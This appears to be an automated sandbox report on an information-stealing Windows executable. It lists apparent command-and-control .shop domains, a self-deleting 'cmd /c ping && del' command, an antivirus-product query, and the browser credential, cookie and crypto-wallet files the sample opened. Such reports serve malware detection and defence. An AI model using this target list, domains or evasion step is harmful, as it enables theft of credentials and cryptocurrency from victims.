Source: lWjPtDoy2N.exe, 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: tolerateilusidjukl.shop
Source: lWjPtDoy2N.exe, 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: productivelookewr.shop
Source: lWjPtDoy2N.exe, 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: poledoverglazedkilio.shop
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\user\Desktop\13w4NM6mPa.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 3 /nobreak Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: Amcache.hve.0.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.0.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.0.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.0.dr Binary or memory string: MsMpEng.exe
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lWjPtDoy2N.exe PID: 3368, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: lWjPtDoy2N.exe, 00000006.00000002.2064189081.0000000002E12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum-LTC
Source: lWjPtDoy2N.exe, 00000006.00000002.2061643737.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets4`
Source: lWjPtDoy2N.exe, 00000006.00000002.2061643737.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: Wallets/JAXX New Version
Source: lWjPtDoy2N.exe, 00000006.00000002.2064343383.0000000002E6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: lWjPtDoy2N.exe, 00000006.00000002.2064368297.0000000002E90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: lWjPtDoy2N.exe, 00000006.00000002.2061643737.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: Wallets/BinanceC:\Users\user\AppData\Roaming\Binance
Source: lWjPtDoy2N.exe, 00000006.00000002.2064368297.0000000002E90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
Source: lWjPtDoy2N.exe, 00000006.00000002.2064391491.0000000002EAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: lWjPtDoy2N.exe, 00000006.00000002.2064391491.0000000002EAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: Yara match File source: Process Memory Space: lWjPtDoy2N.exe PID: 3368, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lWjPtDoy2N.exe PID: 3368, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs